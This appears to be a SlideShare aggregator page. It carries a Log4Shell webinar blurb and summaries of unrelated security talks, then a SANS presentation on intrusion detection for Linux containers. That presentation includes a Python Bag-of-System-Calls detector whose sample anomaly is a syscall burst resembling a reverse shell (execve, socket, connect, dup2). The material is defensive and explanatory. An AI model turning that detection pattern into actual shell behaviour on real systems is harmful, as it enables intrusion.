On December 9th, researchers uncovered a zero-day critical vulnerability in the Apache Log4j library used by millions of Java applications. CVE-2021-44228, or “Log4Shell”, is an RCE vulnerability that allows attackers to execute arbitrary code and potentially take full control over an infected system. The vulnerability has been ranked a 10/10 on the CVSSv3 severity scale.
While the Apache Foundation has already released a patch for this CVE, it can take weeks or months for vendors to update their software, and there are already widespread scans being conducted by malicious attackers to exploit Log4Shell.
What should companies or organizations do?
Join Marco Preuss, Head of Europe’s Global Research and Analysis (GReAT) team, Marc Rivero and Dan Demeter, Senior Security Researchers with GReAT, for an in-depth discussion on Log4Shell and a live Q&A session.
To see the full webinar, please visit: https://securelist.com/webinars/log4shell-vulnerability-how-to-stay-secure/?utm_source=Slideshare&utm_medium=partner&utm_campaign=gl_jespo_je0066&utm_content=link&utm_term=gl_Slideshare_organic_s966w1tou5a0snh
This document discusses container security, providing a brief history of containers, security benefits and challenges of containers, and approaches to container vulnerability management and responding to attacks. It notes that while containers are not new, their adoption has increased rapidly in recent years. The document outlines security advantages like smaller surface areas but also challenges like managing vulnerabilities across many moving parts. It recommends strategies like using official images, hardening hosts, scanning for vulnerabilities, and practicing incident response for containers.
This presentation provides an overview of firewalls and their limitations. It discusses how firewalls are designed to control data flows but have hardware, memory, time, and logic constraints. The presentation then demonstrates common attack techniques like impersonation and session hijacking that can bypass firewalls. It shows how easily available hacking tools allow attacks to be performed with little skill or effort. The key point is that while firewalls provide some security, a holistic security program is needed to fully prevent, detect, and respond to threats.
An Attacker Looks at Docker: Approaching Multi-Container Applications (Priyanka Aash)
Containerization, such as that provided by Docker, is becoming very popular among developers of large-scale applications. This is likely to make life a lot easier for attackers.
While exploitation and manipulation of traditional monolithic applications might require specialized experience and training in the target languages and execution environment, applications made up of services distributed among multiple containers can be effectively explored and exploited "from within" using many of the system- and network-level techniques that attackers, such as penetration testers, already know.
The goal of this talk is to provide a penetration tester experienced in exploitation and post-exploitation of networks and systems with an exposure to containerization and the implications it has on offensive operations. Docker is used as a concrete example for the case study. A penetration tester can expect to leave this presentation with a practical exposure to multi-container application post-exploitation that is as buzzword-free as is possible with such a trendy topic.
Too soft[ware defined] networks: SD-WAN vulnerability assessment (Sergey Gordeychik)
This document discusses security assessments of software-defined wide area networks (SD-WANs). It begins with an introduction to SD-WAN features and architectures. It then outlines the researchers' approach, which involves examining the SD-WAN attack surface and testing for security issues. The document summarizes potential threats in areas like the control plane, data plane, and virtual network functions. It also provides the perspectives of different roles involved in SD-WANs, such as network engineers, software architects, and security analysts. The researchers conducted a security assessment of SD-WAN that involved examining access control, platform security, management interfaces, and other components.
This document provides an overview of an offensive cyber security engineer training program offered by infosectrain.com. The 120-hour instructor-led online program includes training in ethical hacking, penetration testing, cyber security tools and techniques. It aims to provide students with skills in areas like reconnaissance, scanning, vulnerability analysis, exploitation, post-exploitation, and reporting. The program covers topics such as Active Directory penetration testing, password cracking, and privilege escalation. It includes hands-on labs and prepares students for the EC-Council Certified Ethical Hacker certification exam.
The Offensive Cyber Security Certification will upgrade your skills to become a pentester, exploit developer. You will learn multiple offensive approaches to access infrastructure, environment, and information, performing risk analysis and mitigation, compliance, and much more with this program.
https://www.infosectrain.com/courses/offensive-cyber-security-engineer-training/
Cem Gurkok presented on containers and security. The presentation covered threats to containers like container exploits and tampering of images. It discussed securing the container pipeline through steps like signing, authentication, and vulnerability scans. It also covered monitoring containers and networks, digital forensics techniques, hardening containers and hosts, and vulnerability management.
The SOC analyst training program is meticulously designed by the subject matter experts at Infosec Train. The training program offers a deep insight into the SOC operations and workflows. It is an excellent opportunity for aspiring and current SOC analysts (L1/L2/L3) to level up their skills to mitigate business risks by effectively handling and responding to security threats.
https://www.infosectrain.com/courses/soc-analyst-expert-training/
Mining Software Repositories for Security: Data Quality Issues Lessons from T... (CREST)
This presentation highlights a range of issues that arise when dealing with data quality, and poses several recommendations, including:
• Consideration of label noise in the negative class
  • Semi-supervised learning, e.g., self-training, or positive/unlabeled training on the unlabeled set
• Consideration of timeliness
  • Currently labeled data and more positive samples; preserve the data sequence for training
• Use of data visualization
  • Try to achieve better data understandability for non-data scientists
• Creation and use of diverse language datasets
  • Bug seeding into semantically similar languages
• Use of data quality assessment criteria
  • Determine and use specific data quality assessment approaches
• Better data sharing and governance
Presented by Tim Mackey, Senior Technology Evangelist, Black Duck Software on August 17.
To use containers safely, you need to be aware of potential security issues and the tools you need for securing container-based systems. Secure production use of containers requires an understanding of how attackers might seek to compromise the container, and what you should be aware of to minimize that potential risk.
Tim Mackey, Senior Technical Evangelist at Black Duck Software, provides guidance for developing container security policies and procedures around threats such as:
1. Network security
2. Access control
3. Tamper management and trust
4. Denial of service and SLAs
5. Vulnerabilities
Register today to learn about the biggest security challenges you face when deploying containers, and how you can effectively deal with those threats.
Watch the webinar on BrightTalk: http://bit.ly/2bpdswg
Azure 101: Shared responsibility in the Azure Cloud (Paulo Renato)
Whether you’re working exclusively on Azure or with multiple cloud environments, there are certain things you should consider when moving assets to the public cloud. As with any cloud deployment, security is a top priority, and moving your workloads to the Azure cloud doesn’t mean you’re not responsible for the security of your operating system, applications, and data.
Building on the security of the Azure infrastructure, this shared security responsibility starts with making sure your environment is secure. In this session, we will discuss step-by-step what you need to do to secure access at the administrative, application and network layers.
DCSF19 Container Security: Theory & Practice at Netflix (Docker, Inc.)
Michael Wardrop, Netflix
Usage of containers has undergone rapid growth at Netflix and it is still accelerating. Our container story started organically with developers downloading Docker and using it to improve their developer experience. The first production workloads were simple batch jobs, pioneering micro-services followed, then status as a first class platform running critical workloads.
As the types of workloads changed and their importance increased, the security of our container ecosystem needed to evolve and adapt. This session will cover some security theory, architecture, along with practical considerations, and lessons we learnt along the way.
Applied Security for Containers, OW2con'18, June 7-8, 2018, Paris (OW2)
Container usage is rising constantly in the existing cloud ecosystem.
Most companies are evaluating how to migrate to newer, flexible and automated platforms for content and application delivery.
Containers are building themselves all across the business, but who's securing them?
This presentation discusses the evolution of infrastructure solutions from servers to containers, and how they can be secured.
What open source security options are available today?
Where is the future of container security leading?
What will come after containers?
DevSecCon Tel Aviv 2018 - End2End containers SSDLC by Vitaly Davidoff (DevSecCon)
This document discusses securing the software development lifecycle (SDLC) when using containers. It begins with an introduction to SDLC models like waterfall and agile. It then covers challenges in applying application security with containers, including unclear boundaries and responsibilities. The main body details how to apply security practices at each phase of the SDLC for containers: requirements, design, implementation, testing, and operations. Key practices include threat modeling, secure coding, image validation, and monitoring. It concludes with emphasizing the importance of involving security champions throughout the process.
What do a Lego brick and the XZ backdoor have in common? (Speck&Tech)
ABSTRACT: At first glance, a Lego brick and the XZ backdoor might have in common the fact that both are building blocks, or dependencies, of creative and software projects. The reality is that a Lego brick and the case of the XZ backdoor have much more than that in common.
Join the presentation to immerse yourself in a story of interoperability, standards and open formats, and then discuss the important role that contributors play in a sustainable open source community.
BIO: Advocate of free software and of standard and open formats. She has been an active member of the Fedora and openSUSE projects and co-founded the Associazione LibreItalia, where she has been involved in several events, migrations and training related to LibreOffice. Previously she worked on LibreOffice migrations and training courses for several public administrations and private organisations. Since January 2020 she has worked at SUSE as a Software Release Engineer for Uyuni and SUSE Manager, and when she is not following her passion for computers and for Geeko she cultivates her curiosity for astronomy (from which her nickname deneb_alpha derives).
UiPath Test Automation using UiPath Test Suite series, part 5 (DianaGray10)
Welcome to UiPath Test Automation using UiPath Test Suite series part 5. In this session, we will cover CI/CD with DevOps.
Topics covered:
• CI/CD within UiPath
• End-to-end overview of a CI/CD pipeline with Azure DevOps
Speaker:
Lyndsey Byblow, Test Suite Sales Engineer @ UiPath, Inc.
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0! (SOFTTECHHUB)
As the digital landscape continually evolves, operating systems play a critical role in shaping user experiences and productivity. The launch of Nitrux Linux 3.5.0 marks a significant milestone, offering a robust alternative to traditional systems such as Windows 11. This article delves into the essence of Nitrux Linux 3.5.0, exploring its unique features, advantages, and how it stands as a compelling choice for both casual users and tech enthusiasts.
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor... (SOFTTECHHUB)
The choice of an operating system plays a pivotal role in shaping our computing experience. For decades, Microsoft's Windows has dominated the market, offering a familiar and widely adopted platform for personal and professional use. However, as technological advancements continue to push the boundaries of innovation, alternative operating systems have emerged, challenging the status quo and offering users a fresh perspective on computing.
One such alternative that has garnered significant attention and acclaim is Nitrux Linux 3.5.0, a sleek, powerful, and user-friendly Linux distribution that promises to redefine the way we interact with our devices. With its focus on performance, security, and customization, Nitrux Linux presents a compelling case for those seeking to break free from the constraints of proprietary software and embrace the freedom and flexibility of open-source computing.
Sudheer Mechineni, Head of Application Frameworks, Standard Chartered Bank
Discover how Standard Chartered Bank harnessed the power of Neo4j to transform complex data access challenges into a dynamic, scalable graph database solution. This keynote will cover their journey from initial adoption to deploying a fully automated, enterprise-grade causal cluster, highlighting key strategies for modelling organisational changes and ensuring robust disaster recovery. Learn how these innovations have not only enhanced Standard Chartered Bank’s data infrastructure but also positioned them as pioneers in the banking sector’s adoption of graph technology.
In the rapidly evolving landscape of technologies, XML continues to play a vital role in structuring, storing, and transporting data across diverse systems. The recent advancements in artificial intelligence (AI) present new methodologies for enhancing XML development workflows, introducing efficiency, automation, and intelligent capabilities. This presentation will outline the scope and perspective of utilizing AI in XML development. The potential benefits and the possible pitfalls will be highlighted, providing a balanced view of the subject.
We will explore the capabilities of AI in understanding XML markup languages and autonomously creating structured XML content. Additionally, we will examine the capacity of AI to enrich plain text with appropriate XML markup. Practical examples and methodological guidelines will be provided to elucidate how AI can be effectively prompted to interpret and generate accurate XML markup.
Further emphasis will be placed on the role of AI in developing XSLT, or schemas such as XSD and Schematron. We will address the techniques and strategies adopted to create prompts for generating code, explaining code, or refactoring the code, and the results achieved.
The discussion will extend to how AI can be used to transform XML content. In particular, the focus will be on the use of AI XPath extension functions in XSLT, Schematron, Schematron Quick Fixes, or for XML content refactoring.
The presentation aims to deliver a comprehensive overview of AI usage in XML development, providing attendees with the necessary knowledge to make informed decisions. Whether you’re at the early stages of adopting AI or considering integrating it in advanced XML development, this presentation will cover all levels of expertise.
By highlighting the potential advantages and challenges of integrating AI with XML development tools and languages, the presentation seeks to inspire thoughtful conversation around the future of XML development. We’ll not only delve into the technical aspects of AI-powered XML development but also discuss practical implications and possible future directions.
Maruthi Prithivirajan, Head of ASEAN & IN Solution Architecture, Neo4j
Get an inside look at the latest Neo4j innovations that enable relationship-driven intelligence at scale. Learn more about the newest cloud integrations and product enhancements that make Neo4j an essential choice for developers building apps with interconnected data and generative AI.
Building RAG with self-deployed Milvus vector database and Snowpark Container... (Zilliz)
This talk will give hands-on advice on building RAG applications with an open-source Milvus database deployed as a docker container. We will also introduce the integration of Milvus with Snowpark Container Services.
Threats to mobile devices are more prevalent and increasing in scope and complexity. Users of mobile devices want to take full advantage of the features available on those devices, but many of those features provide convenience and capability at the cost of security. This best practices guide outlines steps users can take to better protect their personal devices and information.
Observability Concepts EVERY Developer Should Know -- DeveloperWeek Europe.pdf (Paige Cruz)
Monitoring and observability aren’t traditionally found in software curriculums, and many of us cobble this knowledge together from whatever vendor or ecosystem we were first introduced to and whatever is part of our current company’s observability stack.
While the dev and ops silo continues to crumble, many organizations still relegate monitoring and observability to the purview of ops, infra and SRE teams. This is a mistake: achieving a highly observable system requires collaboration up and down the stack.
I, a former op, would like to extend an invitation to all application developers to join the observability party, and will share these foundational concepts to build on:
20 Comprehensive Checklist of Designing and Developing a Website (Pixlogix Infotech)
Dive into the world of Website Designing and Developing with Pixlogix! Looking to create a stunning online presence? Look no further! Our comprehensive checklist covers everything you need to know to craft a website that stands out. From user-friendly design to seamless functionality, we've got you covered. Don't miss out on this invaluable resource! Check out our checklist now at Pixlogix and start your journey towards a captivating online presence today.
Removing Uninteresting Bytes in Software Fuzzing (Aftab Hussain)
Imagine a world where software fuzzing, the process of mutating bytes in test seeds to uncover hidden and erroneous program behaviors, becomes faster and more effective. A lot depends on the initial seeds, which can significantly dictate the trajectory of a fuzzing campaign, particularly in terms of how long it takes to uncover interesting behaviour in your code. We introduce DIAR, a technique designed to speed up fuzzing campaigns by pinpointing and eliminating the uninteresting bytes in the seeds. Picture this: instead of wasting valuable resources on meaningless mutations in large, bloated seeds, DIAR removes the unnecessary bytes, streamlining the entire process.
In this work, we equipped AFL, a popular fuzzer, with DIAR and examined two critical Linux tools: libxml's xmllint, a tool for parsing XML documents, and Binutils' readelf, an essential debugging and security analysis command-line tool used to display detailed information about ELF (Executable and Linkable Format) files. Our preliminary results show that AFL+DIAR not only discovers new paths more quickly but also achieves higher coverage overall. This work thus showcases how starting with lean and optimized seeds can lead to faster, more comprehensive fuzzing campaigns, and DIAR helps you find such seeds.
- These are slides of the talk given at the IEEE International Conference on Software Testing, Verification and Validation Workshops, ICSTW 2022.
20240609 QFM020 Irresponsible AI Reading List May 2024
Container intrusions Do You Even IDS
Slide 1 (SANS Technology Institute - Candidate for Master of Science Degree)
Container Intrusions: Do You Even IDS?
Alfredo Hickman
April, 2018
GIAC GCIA, GPEN, GCIH, GSEC
Slide 2: Objectives
• After this presentation, you’ll have a foundational understanding of Linux application container benefits and history.
• You’ll be empowered with a security primer on Linux application containers.
• You’ll understand the paradigm shift between intrusion detection and analysis in traditional vs. container networks.
• You’ll be able to test and assess different classes of container IDSs for effectiveness.
Slide 3: Linux Containers: Benefits and History
• 1979: Unix v7 change root (chroot)
• Early 2000’s: FreeBSD Jails, Linux VServer, Solaris Zones
• 2002 – 2007: Control Groups (cgroups), Namespaces
• 2008 – 2014: LXC, Docker, rkt
Slide 4: Linux Containers: a Security Primer
• Container security challenges: complexity and speed
Slide 5: Linux Containers: a Security Primer
• The lack of scholarly research into container security
Slide 6: Linux Containers: a Security Primer
• The vulnerability and threat landscape of Linux containers
  • Synergistic-power attack
  • Process isolation escape
  • Data leakage attacks (emanations)
  • Spectre/Meltdown: memory read bounds control and process isolation violation
  • Compounded vulnerabilities
  • Microservices and deployment density surface area
Slide 7: Linux Containers: a Security Primer
• Container security platforms and CI/CD pipeline security
  • Code contributor identity and access controls
  • Code commit integrity validation
  • Vulnerability management (host, packages, images)
  • Network, host, and container runtime component hardening
  • Log management, security analytics, and threat hunting
Slide 8: Linux Containers: a Security Primer
• Intrusion detection and analysis in traditional networks
  • Static or pre-defined application network port mappings
  • Linux kernel audit (some kernel tapping)
  • Network interface tapping
  • Network traffic profiling and security analytics
Slide 9: Linux Containers: a Security Primer
• Intrusion detection and analysis in container networks
  • Bag of System Calls (BoSC)
  • Kernel tapping modules (commonplace)
  • Network interface tapping (software overlay networks)
  • Network observability analytics
  • Adaptive application traffic profiling
  • Adaptive application network port mapping
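As an added illustration of the Bag of System Calls (BoSC) approach listed above (example code written for this page, not taken from the presentation or from any IDS product): a BoSC turns each sliding window of a container process's syscall trace into a frequency vector, ignoring call order, and a window whose vector is far from every vector learned during a clean baseline run is flagged as anomalous. The syscall traces, the window size and the distance threshold below are constructed assumptions for the demo, not data from the research.

```python
"""Bag-of-System-Calls (BoSC) anomaly detection over a container syscall trace.

Added example: each sliding window of `window` syscalls becomes a bag
(multiset) of syscall names. A clean baseline run populates the set of known
bags; at detection time each window is scored by its L1 distance to the
nearest known bag, and windows scoring above `threshold` are reported.
All traces here are constructed sample data, not captured output.
"""
from collections import Counter
from typing import Dict, List, Tuple

Bag = Tuple[Tuple[str, int], ...]  # sorted (syscall, count) pairs; hashable


def bags(trace: List[str], window: int) -> List[Counter]:
    """Slide a window over the trace and count the syscalls inside each one."""
    if window <= 0 or window > len(trace):
        raise ValueError("window must be between 1 and len(trace)")
    return [Counter(trace[i:i + window]) for i in range(len(trace) - window + 1)]


def freeze(bag: Counter) -> Bag:
    """Hashable key for a bag so exact matches are an O(1) lookup."""
    return tuple(sorted(bag.items()))


def l1_distance(a: Counter, b: Counter) -> int:
    """Sum of absolute count differences over every syscall seen in either bag."""
    return sum(abs(a[k] - b[k]) for k in set(a) | set(b))


class BoSCDetector:
    def __init__(self, window: int = 6, threshold: int = 2):
        self.window = window
        self.threshold = threshold
        self.normal: Dict[Bag, Counter] = {}

    def learn(self, trace: List[str]) -> None:
        """Baseline phase: remember every bag produced by a trusted trace."""
        for bag in bags(trace, self.window):
            self.normal[freeze(bag)] = bag

    def score(self, bag: Counter) -> int:
        """Distance to the nearest learned bag (0 for an exact match)."""
        if freeze(bag) in self.normal:
            return 0
        return min(l1_distance(bag, known) for known in self.normal.values())

    def detect(self, trace: List[str]) -> List[Tuple[int, int, Dict[str, int]]]:
        """Return (window offset, distance, bag) for each window above threshold."""
        alerts = []
        for offset, bag in enumerate(bags(trace, self.window)):
            distance = self.score(bag)
            if distance > self.threshold:
                alerts.append((offset, distance, dict(bag)))
        return alerts


# Constructed sample: a request-handling loop of a web server process.
REQUEST_CYCLE = ["accept4", "read", "openat", "fstat", "read", "write", "close", "close"]
NORMAL_TRACE = REQUEST_CYCLE * 5

# Constructed sample: the same loop with a burst of syscalls the web server never
# makes during its baseline (a child program being spawned and a new outbound
# socket set up), followed by a return to normal service.
SUSPECT_TRACE = (REQUEST_CYCLE * 2
                 + ["execve", "socket", "connect", "dup2", "dup2", "read"]
                 + REQUEST_CYCLE)


def run_demo() -> List[Tuple[int, int, Dict[str, int]]]:
    """Learn from the clean trace, then score the suspect trace."""
    detector = BoSCDetector(window=6, threshold=2)
    detector.learn(NORMAL_TRACE)
    return detector.detect(SUSPECT_TRACE)


if __name__ == "__main__":
    for offset, distance, bag in run_demo():
        print(f"window {offset:2d}: distance {distance} bag {bag}")
```

Because every window holds the same number of calls, the L1 distance between two bags is always even, so a threshold of 2 tolerates one swapped syscall per window and flags windows containing two or more calls absent from the baseline. That is why the two windows at the edges of the burst (offsets 11 and 20, each with a single unknown call) stay quiet while offsets 12 through 19 fire. In practice the trace would come from a kernel tap (the audit subsystem or a module such as the falco-probe mentioned later in this deck), and the baseline would be learned per image rather than per process.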
Slide 11: IDS Effectiveness Criteria & Test Cases
• Detection of scanning activity
• Detection of application attacks
• Detection of malware deployment
• Detection of malware execution
• Detection of malicious command and control
• Detection of malicious privilege escalation
Slide 12: IDS Effectiveness Criteria & Test Cases
• Detection of malicious data exfiltration
• Detection of file integrity violations
• Detection of leaked system data
• Auto-detection of anomalous behavior
• Auto-detection of attacker, victim, infrastructure relationship
• Capability for forensic artifact retrieval (PCAP, flow, logs)
Slide 13: Scoring System
Points  Criteria
1       Not effective (method did not work)
2       Moderately effective (method worked, but did not allow for complete functionality, or equivalent to a traditional network implementation)
3       Effective (method worked as effectively as a traditional network implementation)
Note: potential for assessor bias
Slide 14: Research Review & Results
• Scenarios and Results
  • Security Onion with Snort and OSSEC protecting a virtualized web server hosting DVWA = 44
  • Security Onion with Snort and OSSEC protecting a Dockerized web server hosting DVWA = 40
  • Wazuh with OSSEC HIDS and PCI DSS module protecting a Dockerized web server hosting DVWA = 38
  • Sysdig Falco with the falco-probe kernel module protecting a Dockerized web server hosting DVWA = 43
Slide 15: Summary
• Intrusion detection and analysis in traditional vs. container networks
• Research, testing, and results
• The field is hot, the practice is young, the vulnerabilities are ongoing, and the threats are real